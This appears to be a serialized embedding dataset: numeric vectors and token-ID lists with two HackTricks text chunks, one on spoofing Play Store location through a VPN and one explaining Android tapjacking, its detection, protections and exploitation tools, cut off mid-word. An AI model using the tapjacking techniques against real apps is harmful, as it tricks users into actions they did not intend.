0.7994268536567688, -0.02030065655708313, 0.49070096015930176, -0.888404130935669, -0.4766862094402313, -0.0017287605442106724, -1.1716456413269043, -0.80743008852005, 0.6055489778518677, 0.03400604799389839, 0.6508190035820007, 0.15261894464492798, 0.6324701309204102, 0.6912455558776855, -0.6494763493537903, -0.865839958190918, -0.662704586982727, 0.5570847988128662, -0.8213052749633789, -0.1314477026462555, 0.5881207585334778, -0.507624089717865, 0.6615231037139893, -0.305315762758255, -1.0645802021026611, -0.35412678122520447, 0.1395287960767746, 0.15939775109291077, -0.43201568722724915, -0.1178707629442215, 0.1969495415687561, -0.05258263647556305, -0.0026163815055042505, 0.23687297105789185, 0.7709067463874817, 0.7756291031837463, -0.4406515955924988, 0.7972175478935242, -0.4228546619415283, 0.7120228409767151, -0.7563199996948242, -0.9503792524337769, 0.498310387134552, 0.5281971096992493, -0.076169952750206, -0.25587335228919983, -0.3933914005756378, 0.3452959358692169, 0.003600215772166848, 0.3765467405319214, 0.4525916874408722, -0.6668716669082642, 0.20260025560855865, -0.32706016302108765, 0.9535120725631714, -0.31247279047966003, -0.3497049808502197, -0.6310374140739441, -0.9918221235275269, -0.3144384026527405, -0.4280088245868683, 0.7105166912078857, 0.34665805101394653, -0.5421061515808105, 0.4713992476463318, 0.08843076229095459, -0.850310742855072, 0.6263470649719238, 0.4968266189098358, -0.020146362483501434, -0.48751506209373474, 0.5484765768051147, 0.4761659801006317, -0.4311424493789673, 0.10622825473546982, -0.261799693107605, 0.6295953989028931, 0.8637827038764954, 0.6070852875709534, -0.508230984210968, -0.4470224678516388, 0.14297787845134735 ]
[ 1997, 1037, 3853, 1006, 2689, 1996, 2193, 1997, 1996, 10857, 2004, 4072, 1007, 1012, 2009, 2097, 2202, 1996, 3643, 1997, 2023, 1012, 1051, 1010, 10938, 2009, 2000, 5164, 1998, 2068, 2191, 1037, 15174, 2007, 2049, 3643, 1012, 9530, 3367, 1013, 1018, 1058, 10790, 1010, 1014, 2595, 2487, 8663, 3367, 1013, 1018, 1058, 14526, 1010, 1014, 2595, 2487, 8663, 3367, 1013, 1018, 1058, 12521, 1010, 1014, 2595, 2487, 25538, 2102, 1058, 10790, 1010, 1052, 2692, 1010, 29215, 5358, 1013, 8224, 1013, 14931, 2546, 1013, 4618, 8545, 13068, 16098, 4168, 1013, 2208, 18908, 7730, 1025, 1011, 1028, 1051, 1024, 2462, 2078, 6767, 3489, 1011, 10763, 1063, 1058, 10790, 1065, 1010, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1011, 1028, 3643, 11253, 1006, 1045, 1007, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 2693, 1011, 2765, 1011, 4874, 1058, 14526, 2378, 6767, 3489, 1011, 10763, 1063, 1052, 2692, 1010, 1058, 14526, 1010, 1058, 12521, 1065, 1010, 2455, 22943, 1013, 15536, 24291, 1013, 15174, 1025, 1011, 1028, 2191, 18209, 1006, 2455, 22943, 1013, 4180, 1013, 6123, 1025, 1048, 3900, 3567, 1013, 11374, 1013, 25869, 3366, 4226, 5897, 1025, 1045, 1007, 2455, 22943, 1013, 15536, 24291, 1013, 15174, 1025, 2693, 1011, 2765, 1011, 4874, 1058, 12521, 2378, 6767, 3489, 1011, 7484, 1063, 1058, 12521, 1065, 1010, 2455, 22943, 1013, 15536, 24291, 1013, 15174, 1025, 1011, 1028, 2265, 1006, 1007, 1058, 102 ]
hack_tricks
424.txt
3
[CLS] spoofing your location in play storeinformation copied from url a times you have seen that application which you want to assess is only allowed in selected countries, so in that case you won ’ t be able to install that application on you android device. but if you can spoof your location to that country in which the application is allowed then you can get access to that application. below is the procedure of the same. first install hotspot shield free vpn proxy from google play store. now connect using it and choose your required country. now go to settings > > apps > > google play store and then tap on force stop and then on clear data. open up google play store and now you will be able to search and install the application which is only available in that country. [SEP]
[ -0.1884307712316513, 0.02658328041434288, -0.88645339012146, -0.07384683191776276, 0.43797624111175537, 0.05064826458692551, 0.36478403210639954, 0.4178193211555481, 0.4060227870941162, 0.6742509007453918, 0.3390958607196808, 0.7097821831703186, 1.1571751832962036, -0.2969076633453369, -0.6833399534225464, 0.2880832850933075, -0.42064452171325684, 0.5362507700920105, 0.4755556285381317, -0.09550516307353973, 0.37267252802848816, -0.176090806722641, -0.6484428644180298, 0.06797582656145096, 0.4541262090206146, 0.09236890822649002, -0.031245913356542587, 0.3115014135837555, 1.119425654411316, 0.4429348409175873, -0.061420634388923645, 0.7373539209365845, 0.131028413772583, -0.26511290669441223, -0.1814548671245575, -0.5606337189674377, 0.3306850790977478, -0.03635892644524574, -0.18747423589229584, -0.2414150834083557, 0.05545071139931679, 0.04819227755069733, 0.7514398694038391, -0.6396238207817078, -0.23260855674743652, -0.49034273624420166, -1.237191081047058, -0.5599586367607117, 0.3452272117137909, 0.3840864300727844, 0.16519653797149658, 1.8494675159454346, 0.6605650186538696, -0.0033745120745152235, -0.3170791268348694, -0.15204571187496185, -0.2627818286418915, -0.1444033980369568, 0.03928364813327789, 0.013568611815571785, -0.7755728363990784, 0.6596565246582031, 0.4090782701969147, -0.6811931133270264, 0.48381102085113525, 0.5077229142189026, 0.335239976644516, 0.3290296494960785, 0.5931816101074219, -0.7308057546615601, -0.3076062798500061, -0.2247098833322525, -0.3180108666419983, -1.506616234779358, 0.9211412072181702, 0.6789434552192688, -0.6987499594688416, -0.195908322930336, 0.8544096946716309, 0.4473610520362854, 0.48229268193244934, 0.8075213432312012, 0.25280746817588806, -0.9114341139793396, -1.00015127658844, 0.46705177426338196, 0.6836380362510681, 0.2968169152736664, -0.3882334530353546, 0.19861631095409393, -0.6092162728309631, 0.785689651966095, -0.26758331060409546, -0.43417683243751526, -0.1733371615409851, 0.3044804036617279, -0.23666131496429443, 0.38013389706611633, 0.5829346776008606, -0.677223265171051, 0.7935064435005188, 0.8187149167060852, -0.43069177865982056, 1.0954821109771729, 0.8453413248062134, 0.850947380065918, -0.27507278323173523, -0.6601267457008362, -0.8748157620429993, -1.2718456983566284, -0.1213415190577507, 0.23647816479206085, -0.5885663032531738, -1.4292322397232056, 0.10196151584386826, -0.5145832300186157, -0.311516135931015, 0.7689551115036011, 0.17638440430164337, 0.4164541959762573, -0.13380223512649536, 0.27621251344680786, 0.41121646761894226, 0.5090017914772034, 0.028910839930176735, -0.25378653407096863, 0.24202845990657806, 0.4157892167568207, -0.02670826017856598, 0.02516888454556465, -0.18508321046829224, -0.23908770084381104, 0.31325820088386536, 0.8847805261611938, -0.323585569858551, 0.3387206196784973, -0.6376141309738159, -0.009969132021069527, 0.4443246126174927, -0.7088246941566467, -0.1726301908493042, 0.18656344711780548, 0.112899549305439, 1.370581030845642, -0.030751504004001617, -0.13012199103832245, 0.054652296006679535, 0.08746551722288132, -0.6103569865226746, 0.4764265716075897, 0.10521218180656433, 0.14495110511779785, 0.48432445526123047, 0.25018781423568726, 0.4448288083076477, 1.3046905994415283, -0.19458135962486267, 0.5779513716697693, 0.6502088308334351, 0.19609878957271576, -0.5309845209121704, 0.0719858705997467, 0.2715023159980774, 0.47374677658081055, 0.5228036046028137, 0.13641443848609924, -0.645805299282074, -0.3124702572822571, 0.5725969076156616, -0.12066952884197235, -0.0818726196885109, 0.469194233417511, 0.025127779692411423, 0.05855809897184372, 0.28035616874694824, 0.08807924389839172, 0.44277411699295044, -0.6687166690826416, 0.7837374806404114, 0.5575569272041321, -0.5511282086372375, 0.44089019298553467, 0.009238718077540398, 1.039367437362671, -0.2369460016489029, 0.6709388494491577, -0.5209587216377258, -0.2370958924293518, 0.19318512082099915, 0.144730344414711, 0.08771026134490967, 0.23946645855903625, -0.10677733272314072, 0.5584712028503418, -0.28513041138648987, 0.10165368765592575, -0.9622123837471008, -0.2789427936077118, 0.3200187683105469, -1.1178439855575562, -0.7125493884086609, 0.3722553551197052, 0.5488983392715454, 0.7095361351966858, 0.49347594380378723, -0.6862514615058899, -0.11387278884649277, 0.3958187401294708, -0.43108853697776794, -0.7074805498123169, 0.2228499799966812, 0.3763790726661682, -0.3556622564792633, -1.2290698289871216, 1.2393320798873901, -0.1883191615343094, -0.06524667888879776, 0.43977662920951843, -0.012658784165978432, 0.3863188624382019, 0.36318787932395935, 0.7687401175498962, -0.13828341662883759, 0.24277053773403168, -0.5798140168190002, 0.6555388569831848, 0.40176787972450256, 0.8345394134521484, -0.30224746465682983, 0.10812301188707352, 0.4533284306526184, 0.25404492020606995, 0.2071094810962677, 1.1134902238845825, 0.3097742199897766, 0.7279341220855713, -0.06213773041963577, -0.3225302994251251, -0.49858418107032776, -0.011545050889253616, 0.2181623876094818, 0.8218973875045776, 0.35942113399505615, 0.5185596346855164, -0.3192310035228729, 0.07161692529916763, 0.03481684625148773, 0.41492941975593567, -0.6125058531761169, 0.2175794094800949, -0.8378592133522034, 0.5354250073432922, 0.4943608343601227, 1.0657939910888672, -0.9183081388473511, -0.7829014658927917, 0.12208349257707596, 0.13535089790821075, -0.6216737627983093, -0.009468239732086658, 0.8319056630134583, 0.16431334614753723, -0.47622576355934143, -0.3189164102077484, 0.2333661913871765, 0.21737869083881378, 0.23298300802707672, -0.1995106041431427, -0.23927238583564758, -0.4527086913585663, -0.12718147039413452, -0.30921027064323425, -0.67009037733078, -0.07746264338493347, -1.313275933265686, -0.3994485139846802, 0.18665951490402222, -0.9251208305358887, 0.3969394266605377, -1.194347620010376, 0.5655426383018494, -0.2641719579696655, 0.29487985372543335, 0.07247282564640045, 0.016058631241321564, 0.9629354476928711, 0.016792457550764084, -0.13217778503894806, 0.033875733613967896, 0.3977810740470886, -0.9378744959831238, 1.0020716190338135, -0.27118930220603943, 0.09678591042757034, 0.23951250314712524, -0.9104016423225403, 0.37801870703697205, 0.34045565128326416, -0.6967811584472656, 0.2860272526741028, 0.15575185418128967, -0.24251513183116913, -0.08837588876485825, 0.458737850189209, -0.1275796890258789, 0.07403776794672012, 0.6102720499038696, -0.2837975323200226, 0.39318981766700745, 1.1078927516937256, -0.13781222701072693, 0.3727303147315979, -0.029575524851679802, -0.2663753926753998, -0.6498451232910156, 0.5065217614173889, 1.0017657279968262, -0.013903441838920116, -0.018195951357483864, -0.4815468192100525, -0.21494247019290924, -0.5697192549705505, -0.30046555399894714, 0.18619640171527863, -0.6296331882476807, 0.12325350195169449, -0.17244663834571838, -1.2379785776138306, 0.5543651580810547, -0.7226126790046692, 0.47458508610725403, -0.6937175393104553, -0.5011435151100159, 0.5381112098693848, -0.6072860360145569, -0.5568103790283203, -0.3006815016269684, -0.1578662395477295, -0.36890026926994324, -0.46484261751174927, -0.48087960481643677, -0.6753179430961609, -0.13473735749721527, -0.4671066701412201, -0.059563133865594864, 0.47925159335136414, 0.6300003528594971, 0.6867331266403198, 0.44182541966438293, -0.7481118440628052, -0.8096261620521545, -0.3190329372882843, -0.027981840074062347, -0.16992171108722687, -0.2146538943052292, 1.184456467628479, 0.3585548400878906, -0.11764483898878098, -0.3241562247276306, 0.10749945044517517, -0.06775178015232086, 0.09639342129230499, -0.2190825492143631, -0.170046865940094, 0.07458941638469696, -0.9103212356567383, 0.6192241311073303, 1.1216951608657837, 0.38234588503837585, -1.0790165662765503, 0.52691251039505, -0.6254628896713257, -0.5031675696372986, 0.36530473828315735, -0.2929961085319519, -0.5275006890296936, 1.0309221744537354, 0.10555534064769745, 0.7136601805686951, -0.6070728898048401, -0.3986828029155731, -0.32302793860435486, 0.42941680550575256, 0.7887285947799683, 0.7330855131149292, -0.26474612951278687, -0.47135889530181885, -0.5097013711929321, -0.4477425217628479, 0.0904221385717392, -0.21035346388816833, 0.14843524992465973, 0.10636862367391586, -0.3220185339450836, -0.25756439566612244, -0.3009833097457886, -0.10099101066589355, 0.367807537317276, 1.1658498048782349, 0.5090088844299316, 0.9692907333374023, 0.5779722929000854, -0.21545134484767914, 0.33295589685440063, -0.5820589661598206, -0.23152898252010345, -0.24354131519794464, 0.8591607809066772, -0.6666740775108337, -0.11720137298107147, -0.19502566754817963, -1.0099716186523438, -0.24459469318389893, -0.04658914729952812, -0.41310739517211914, 0.49549126625061035, -0.937850296497345, -0.45734700560569763, 0.24013641476631165, 0.2760622799396515, -0.18224205076694489, -0.5466690063476562, -1.1707967519760132, 0.8323596119880676, 0.9591537117958069, -0.33274438977241516, -0.5071313381195068, -0.6655711531639099, 0.19349519908428192, 0.2875446677207947, -0.0857553482055664, -0.5537691712379456, -0.9166772365570068, -0.20020557940006256, -1.1305798292160034, 0.5781556963920593, -0.2043796330690384, -0.19393832981586456, -0.1601807177066803, -1.0383687019348145, -0.305361270904541, 0.43345245718955994, 0.258952260017395, -0.5248587727546692, -0.5909815430641174, 0.1889735609292984, 0.17682208120822906, -0.04604250565171242, -0.4784838855266571, 0.00991369504481554, 0.6470011472702026, 0.033772263675928116, 0.6087695360183716, -0.38394463062286377, -0.877414882183075, -0.5750733613967896, 0.37138256430625916, 0.22778409719467163, 0.2028840035200119, 0.03277777507901192, 0.7083004713058472, -0.13369029760360718, -0.23768307268619537, -0.7447205781936646, -0.49569952487945557, 0.5871179699897766, 0.15227609872817993, -0.021809812635183334, 0.3727267384529114, 0.5605964660644531, -0.8243259191513062, 1.1699683666229248, -0.28050655126571655, -0.3499779999256134, 0.2020472139120102, -0.5372464656829834, 0.38915982842445374, 0.14174766838550568, -0.6149798631668091, -0.5033196806907654, -0.707433819770813, 0.3680868148803711, 0.2387898564338684, -0.9793485403060913, -0.5530303120613098, -0.7418487071990967, -0.006804644595831633, -0.38075047731399536, -0.534856915473938, 1.5649712085723877, -0.9378626942634583, -0.3207598626613617, 0.15926721692085266, 0.19896283745765686, 0.17317545413970947, -0.29467955231666565, 0.30817657709121704, -0.1228649765253067, 0.2353449910879135, -0.011475113220512867, -0.01279113907366991, 0.35582953691482544, -0.3552950322628021, 0.7591404318809509, 0.19542576372623444, -0.030545899644494057, -0.46123814582824707, -0.3084658980369568, -0.091415636241436, 0.11564890295267105, -0.1923561841249466, 0.6031045913696289, -1.1926113367080688, 0.3457065224647522, 1.8642584085464478, 0.3720415532588959, 0.6765949726104736, -0.07688570022583008, -1.1614898443222046, -0.05295055732131004, -0.09224703162908554, -0.3655880093574524, -1.3504728078842163, -0.2571224868297577, 0.37014272809028625, 0.5220815539360046, -0.3513643741607666, -0.42201298475265503, -0.4063130021095276, -0.42454466223716736, 0.23662906885147095, -0.9165365099906921, -0.28838199377059937, -0.29854634404182434, 0.1721179187297821, -1.0884968042373657, 0.9661887288093567, 0.3254152238368988, 0.04602593928575516, 0.10119263082742691, -0.6338453888893127, 0.8310209512710571, -0.22089433670043945, 0.08727224916219711, -0.15764467418193817, -0.7003319263458252, 0.20849692821502686, 0.7475385069847107, 0.2717977464199066, -0.22424128651618958, 0.01381048746407032, 0.718188464641571, 0.3173670172691345, -0.2803535461425781, -0.04073727875947952, -0.5139617323875427, 0.18963263928890228, 0.3891119956970215, -0.7606877684593201, 0.9578369855880737, -0.7186612486839294, 0.794924259185791, -0.03048984706401825, 0.6523373126983643, -0.49827951192855835, 0.0714046061038971, 0.568333089351654, 0.3348219394683838, 0.3608773350715637, -0.05346262454986572, -0.23864658176898956, -0.04549518600106239, 0.033123403787612915, 0.323984295129776, -0.4684607982635498, -0.3464200794696808, 0.8187345266342163, -0.7566237449645996, -0.7645145058631897, 0.996109664440155, -0.4620499312877655, -0.42766815423965454, -0.0020978045649826527, -0.7897614240646362, 0.503784716129303, 0.5098429322242737, -0.548182487487793, 0.9006678462028503, 0.6856381893157959, -0.5148738622665405, -0.6055368185043335, 0.31956154108047485, 0.7490677833557129, -0.5317673683166504, -0.1872606873512268, -0.28344160318374634, 0.012135112658143044, -0.2651672959327698, 0.3682771921157837, -0.18536223471164703, -0.9504913091659546, 0.2616143524646759, 0.3545658588409424, 0.0018527215579524636, 0.6354284882545471, -0.1742161363363266, -0.8552524447441101, -0.16034500300884247, -0.2884354889392853, -0.16909733414649963, 0.20208969712257385, 1.2133657932281494, 0.8751477599143982, -0.7792440056800842, 0.49732911586761475, -0.24624544382095337, -0.02739722467958927, 0.0688670203089714, -0.24090445041656494, 0.0028937554452568293, -0.7763711214065552, -0.2706742286682129, 0.8927926421165466, -0.8001531958580017, -0.8490400314331055, -0.33710023760795593, 0.15015631914138794, 0.4723968803882599, 0.3399195373058319, 0.07450209558010101, 0.5269293189048767, 0.4126927852630615, 0.8030216097831726, 0.12670807540416718, 0.6218392848968506, -0.3129473626613617, 0.09021668881177902, 0.8546503186225891, -0.1741204410791397, -0.1422923058271408, 0.2841776907444, -0.18272016942501068, -0.4693838357925415, -0.533080518245697, 0.38093021512031555, -0.4856453537940979, 0.4613429605960846, 0.30907899141311646, -0.1332242786884308, -0.182015061378479, 0.3574013411998749, 0.7252269983291626, 0.2803489565849304, 0.4783353805541992, -0.20371785759925842, 0.7340677380561829, -0.7667367458343506, -0.4391443133354187, 0.46954184770584106, 0.6176844239234924, -0.860336422920227, -0.6287890672683716, -0.14848265051841736, -0.17092901468276978, -0.7316946387290955, -0.03250199556350708, -0.6429412961006165, -0.9438259601593018, -0.22895504534244537, -0.5625421404838562, -0.3933826982975006, -0.03499649465084076, -0.20860865712165833, 0.725627064704895, -0.7348005771636963, 0.1466299444437027, -0.9243981838226318, 0.12967200577259064, 0.8064702749252319, 1.0068868398666382, -0.0971137061715126, -0.6573619246482849, 0.5681010484695435, -0.27749311923980713, -0.7033140063285828, -0.48957306146621704, 0.2767041027545929, -0.19215449690818787, 0.08078217506408691, -0.6097396612167358, -0.15607216954231262, -0.3447107970714569, 0.3955914378166199, -0.41597577929496765, 0.3062000274658203, -0.4727751910686493, -1.2753959894180298, -0.6379338502883911, 0.14332222938537598, -0.8887337446212769, 0.8932015299797058, 0.2349919229745865, -0.21845278143882751, 0.2150103747844696, -0.43384188413619995, -0.4645894467830658, 0.4674057364463806, 0.45824116468429565, 0.29076188802719116, 0.37271618843078613, -0.1873505562543869, -0.505221962928772, 0.1990811675786972, 0.7426391839981079, 0.7481246590614319, -1.0717891454696655, 0.5791202187538147, -0.25438979268074036, 0.04241932928562164, 0.4952571392059326, 0.7404913306236267, -0.6963573694229126, 0.36535921692848206, -0.27237579226493835, 0.445147305727005, 0.13102847337722778, 0.5069013833999634, 0.28435513377189636, 0.5027306079864502, 0.6963874697685242, -0.3063409924507141, -0.11623003333806992, 0.7336512804031372, 0.19565878808498383, 0.10121243447065353, 0.03541545942425728, -0.774045467376709, -0.43278637528419495, -0.14071141183376312, -0.7925207614898682, 0.11301679164171219, -0.14478203654289246, 0.8839115500450134, -0.06179077550768852, -0.26287519931793213, -0.44232258200645447, 0.5004878044128418, -1.2714686393737793, -0.3898969292640686, 0.5830454230308533, 0.017110144719481468, -0.32555484771728516, 0.483544260263443, -0.27193933725357056, 0.3060356378555298, -0.295367568731308, -0.3368302285671234, 0.08214616775512695, -0.4077368974685669, -0.04868343845009804, 0.8886589407920837, -0.5365132093429565, -0.15195658802986145, -0.012305053882300854, 0.4519147276878357, -0.9191640615463257, -0.7448055148124695, -0.3310764729976654, 1.100428581237793, -0.39516976475715637, -0.2992974817752838, -1.0129761695861816, -0.8871250152587891, 0.3386457562446594, 0.07529876381158829, 0.45058539509773254, 0.4041077196598053, -0.6833977103233337, 0.8566840291023254, -1.0431997776031494, 0.4851379096508026, 0.5210091471672058, 0.5109503269195557, 0.055504024028778076, 0.25605323910713196, -0.3239253759384155, 0.21198663115501404, -0.38443776965141296, 0.6367533206939697, 0.03486998751759529, 0.0785805955529213, 0.399655282497406, -1.4662940502166748, -0.643125593662262, 0.0038570489268749952, 0.05179817974567413, 0.6724733114242554, 0.18362224102020264, 0.25954294204711914, 0.8111552596092224, 0.05149228498339653, -0.39432379603385925, -0.10521814227104187, 0.514916718006134, -0.423187255859375, -0.18646836280822754, 0.7191097140312195, 0.13257065415382385, -0.3903861939907074, 0.33948400616645813, -0.9571496844291687, -0.030963344499468803, -0.6675119400024414, 0.16550207138061523, 0.38405367732048035, -0.14699456095695496, 0.40245065093040466, -0.49869367480278015, 0.5860126614570618, 0.23189860582351685, -0.529416024684906, 0.13941450417041779, -0.43096062541007996, -1.107704520225525, -0.3514184057712555, 0.9236242771148682, 0.15758778154850006, -0.7124442458152771, 0.23497673869132996, -0.14722275733947754, -0.03286382928490639, 0.48205381631851196, 0.34681573510169983, -1.0221909284591675, -0.4222830533981323, -0.3006020188331604, 0.4754112660884857, -0.20772519707679749, 0.5119197964668274, 0.09785666316747665, -0.4647572338581085, 1.112517237663269, -0.9154753088951111, -0.2389381229877472, -0.2303473949432373, 0.29525041580200195, -0.5879765152931213, -0.7824270129203796, 0.23617734014987946, -0.6491453051567078, -0.2974666953086853, 0.16960257291793823, 0.10317803919315338, 0.3154067099094391, 0.4362685978412628, 1.0678458213806152, 0.08352445065975189, 0.22875159978866577, 0.4858868420124054, 0.6375595927238464, 0.49374300241470337, -0.3854324519634247, -0.9353020787239075, -0.06022464856505394, -0.1480698138475418, -0.2942490577697754, -0.3763175308704376, -0.7659879922866821, -0.5548571348190308, -0.11663463711738586, 1.0087404251098633, -0.03537672013044357, -0.5027155876159668, 0.2272084802389145, -0.005219438578933477, 0.015535150654613972, 0.1427733451128006, 0.9767298102378845, -0.3190031349658966, 0.28400012850761414, -0.3675321042537689, -0.45053261518478394, -0.07917013019323349, 0.09185148030519485, -0.9702214002609253, 0.7317875623703003, -0.21491815149784088, -0.1598859280347824, 0.021135324612259865, -0.621304452419281, -0.45987236499786377, -0.3849310874938965, -0.04809427633881569, 0.05781619995832443, 0.6709030866622925, 0.5554090142250061, 1.039972186088562, 0.19909562170505524, -0.634401261806488, -0.2928948998451233, 0.03488156571984291, 0.06839244812726974, -0.19326412677764893, 0.3149566650390625, -0.08901514112949371, -0.16676048934459686, 0.5198303461074829, -0.2981664538383484, -0.3074606657028198, -0.14258375763893127, -0.21841388940811157, -0.04137406498193741, -0.16268770396709442, -1.034458041191101, -0.4267037808895111, -0.26806172728538513, 0.3409166634082794, -0.5655750036239624, -0.09322240948677063, 0.5372302532196045, -0.2881234586238861, -0.3278523087501526, 0.14996936917304993, -0.026752449572086334, -1.809279203414917, 0.05248085781931877, -0.11581342667341232, -0.017102936282753944, -0.9021831750869751, 3.9117472171783447, 0.490344375371933, -0.46442848443984985, -0.05599118396639824, 0.15763215720653534, 0.768566370010376, 0.6185094714164734, -0.7534555792808533, -0.3578931987285614, -0.27965718507766724, 0.5340051651000977, -0.3734504282474518, 0.38934025168418884, 0.6884123682975769, -0.3784066140651703, 0.013874711468815804, -0.3006521761417389, -0.3828921914100647, 0.9730254411697388, -0.2961479723453522, -0.6301317811012268, 0.17179229855537415, 0.155202254652977, 0.3340446949005127, 0.2131061553955078, -0.3481147885322571, -0.29806241393089294, -0.4628446698188782, -0.7531447410583496, 0.44975143671035767, 0.9335237145423889, -0.8887767195701599, 1.277824878692627, -0.07441599667072296, -0.5009292364120483, -0.08576693385839462, 0.7130148410797119, 0.2271038144826889, -0.20473651587963104, -0.3253629505634308, 0.1890505701303482, 0.412407249212265, -0.4280833303928375, 0.3836873173713684, 0.560961127281189, 0.46892914175987244, -0.6179885268211365, 0.4525757431983948, 0.9293758273124695, 0.20801302790641785, 0.2996883690357208, -0.4919905662536621, 0.6364136338233948, -0.42603376507759094, -0.5030641555786133, -0.16423872113227844, 0.014026655815541744, 0.0322786346077919, 0.1697714775800705, 0.4529419541358948, -0.19553738832473755, 0.03686368837952614, -1.244774580001831, -0.42455169558525085, -0.5033708214759827, 0.5045778751373291, 0.199928879737854, 0.5261508822441101, 0.3160989284515381, 0.03770989924669266, -0.1630192995071411, -1.2817797660827637, -1.2087985277175903, -0.5192248821258545, -0.8265162706375122, 0.3644871115684509, 0.5031296014785767, -0.27557888627052307, -0.8753345608711243, -0.06089175119996071, -0.055503521114587784, 0.7334362268447876, -0.20402640104293823, 0.809837281703949, 0.6512395143508911, 0.9565656185150146, -1.0459327697753906, -0.14347399771213531, 0.5537880659103394, 0.24477949738502502, 1.1931636333465576, 0.040354229509830475, -0.46119943261146545, -0.6589136123657227, 0.4601621925830841 ]
[ 101, 11867, 21511, 2075, 2115, 3295, 1999, 2377, 3573, 2378, 14192, 3370, 15826, 2013, 24471, 2140, 1037, 2335, 2017, 2031, 2464, 2008, 4646, 2029, 2017, 2215, 2000, 14358, 2003, 2069, 3039, 1999, 3479, 3032, 1010, 2061, 1999, 2008, 2553, 2017, 2180, 1521, 1056, 2022, 2583, 2000, 16500, 2008, 4646, 2006, 2017, 11924, 5080, 1012, 2021, 2065, 2017, 2064, 11867, 21511, 2115, 3295, 2000, 2008, 2406, 1999, 2029, 1996, 4646, 2003, 3039, 2059, 2017, 2064, 2131, 3229, 2000, 2008, 4646, 1012, 2917, 2003, 1996, 7709, 1997, 1996, 2168, 1012, 2034, 16500, 2980, 13102, 4140, 6099, 2489, 21210, 2078, 24540, 2013, 8224, 2377, 3573, 1012, 2085, 7532, 2478, 2009, 1998, 5454, 2115, 3223, 2406, 1012, 2085, 2175, 2000, 10906, 1028, 1028, 18726, 1028, 1028, 8224, 2377, 3573, 1998, 2059, 11112, 2006, 2486, 2644, 1998, 2059, 2006, 3154, 2951, 1012, 2330, 2039, 8224, 2377, 3573, 1998, 2085, 2017, 2097, 2022, 2583, 2000, 3945, 1998, 16500, 1996, 4646, 2029, 2003, 2069, 2800, 1999, 2008, 2406, 1012, 102 ]
hack_tricks
425.txt
0
[CLS] tapjackingbasic informationtapjacking is an attack where a malicious application is launched and positions itself on top of a victim application. once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app. in effect, it is blinding the user from knowing they are actually performing actions on the victim app. detectionin order to detect apps vulnerable to this attacked you should search for exported activities in the android manifest ( note that an activity with an intent - filter is automatically exported by default ). once you have found the exported activities, check if they require any permission. this is because the malicious application will need that permission also. protectionandroid 12 ( api 31, 32 ) and higheraccording to this source, tapjacking attacks are automatically prevented by android from android 12 ( api 31 & 30 ) and higher. so, even if the application is vulnerable you won't be able to exploit it. filtertoucheswhenobscuredif android : filtertoucheswhenobscured is set to true, the view will not receive touches whenever view's window is obscured by another visible window. setfiltertoucheswhenobscuredthe attribute setfiltertoucheswhenobscured set to true can also prevent the exploitation of this vulnerability if the android version is lower. if set to true, for example, a button can be automatically disabled if it is obscured : < button android : text = " button " android : id = " @ + id / button1 " android : layout _ width = " wrap _ content " android : layout _ height = " wrap _ content " android : filtertoucheswhenobscured = " true " > < / button > exploitationtapjacking - exportedactivitythe most recent android application performing a tapjacking attack ( + invoking before an exported activity of the attacked application ) can be found in url the readme instructions to use it. floatingwindowappan example project implementing floatingwindowapp, which can be used to put on top of other activities to perform a clickjacking attack, can be fund in floatingwindowapp ( a bit old, good luck building the apk ). qarkit looks like this project is now unmaintained and this functionality isn't properly working anymoreyou can use qark with the - - exploit - apk - - sd
[ 0.32256871461868286, 0.15878871083259583, -1.2069820165634155, 1.2949377298355103, -0.12215644121170044, -0.9741106033325195, 0.027739176526665688, 0.03379683941602707, 0.40480124950408936, 0.7919532060623169, 0.44069966673851013, -0.25728312134742737, 0.6985048055648804, -0.44797250628471375, -0.8559134006500244, -0.5335442423820496, -0.6337963342666626, 0.3190707862377167, -0.7129508256912231, -0.1867588460445404, 0.3144964575767517, 0.923353374004364, -0.2191358357667923, -1.555564284324646, -0.5650190114974976, 0.3706081211566925, 0.9466855525970459, -0.8922647833824158, 0.5057899355888367, 0.5364246368408203, -0.18878522515296936, -0.03156255930662155, 0.15755519270896912, 0.2054443359375, 0.37500086426734924, -0.2852190434932709, 1.0626130104064941, -0.3094880282878876, 0.20865416526794434, -0.6151190996170044, 0.2997329831123352, -0.02683974802494049, 0.6900812387466431, -0.0767958015203476, -0.07954909652471542, -0.46744486689567566, -0.07445595413446426, -0.3278141915798187, 0.001984542002901435, 0.3564204275608063, 0.21527951955795288, 0.4957321882247925, 0.2696298360824585, 0.23885123431682587, -0.08860936015844345, -0.13831084966659546, -0.05201702192425728, 0.09048768132925034, -0.11086776107549667, 0.21857662498950958, -0.5037384033203125, -0.16500160098075867, 0.4259982109069824, -0.8663680553436279, -0.09466876834630966, 0.42670461535453796, -0.29009774327278137, -0.4883761703968048, 0.17946486175060272, -0.30682894587516785, -0.7973202466964722, 0.5815751552581787, -0.5542705059051514, -0.444147527217865, -0.41914400458335876, -0.29370900988578796, -0.5164778232574463, -0.4130840599536896, 0.4077637791633606, 0.4752403497695923, 0.08883512765169144, 0.4965474307537079, 0.16712865233421326, 0.2617849111557007, -0.13341683149337769, -0.3424883484840393, 0.8879022598266602, 0.6908308267593384, -0.484081894159317, -0.33325067162513733, 0.20828242599964142, 0.789143443107605, -0.8394188284873962, -0.6732780337333679, -0.3857361674308777, 0.9587454795837402, -0.21732941269874573, 0.1423792988061905, 0.5852965116500854, -0.07993770390748978, 0.9755966067314148, 0.2556914985179901, -0.2543574869632721, 0.3529261648654938, -0.21129874885082245, 0.5314808487892151, 0.29173755645751953, -0.5541699528694153, -0.7442357540130615, -0.3720145523548126, 0.09834199398756027, -0.007468411698937416, 0.5703331828117371, -0.9558861255645752, -0.4820188879966736, -0.08558744937181473, -0.16547180712223053, 0.41905513405799866, -0.20859256386756897, 0.6888123154640198, -0.3724339008331299, -0.4330824613571167, 0.470836877822876, -0.21362236142158508, 0.48132792115211487, 0.40622612833976746, 0.6417439579963684, 0.35658127069473267, -0.17209720611572266, 0.03339054808020592, -0.08395802229642868, -0.3670881986618042, 0.6110886931419373, 0.9465328454971313, -1.0483591556549072, -0.002369251335039735, 0.48950377106666565, 0.19164589047431946, 0.24743330478668213, -0.6173166632652283, -0.6118669509887695, 0.26038527488708496, 0.113871730864048, 1.3314316272735596, 0.1004311591386795, 0.4453786015510559, -0.41561728715896606, 0.5200970768928528, -0.39387983083724976, 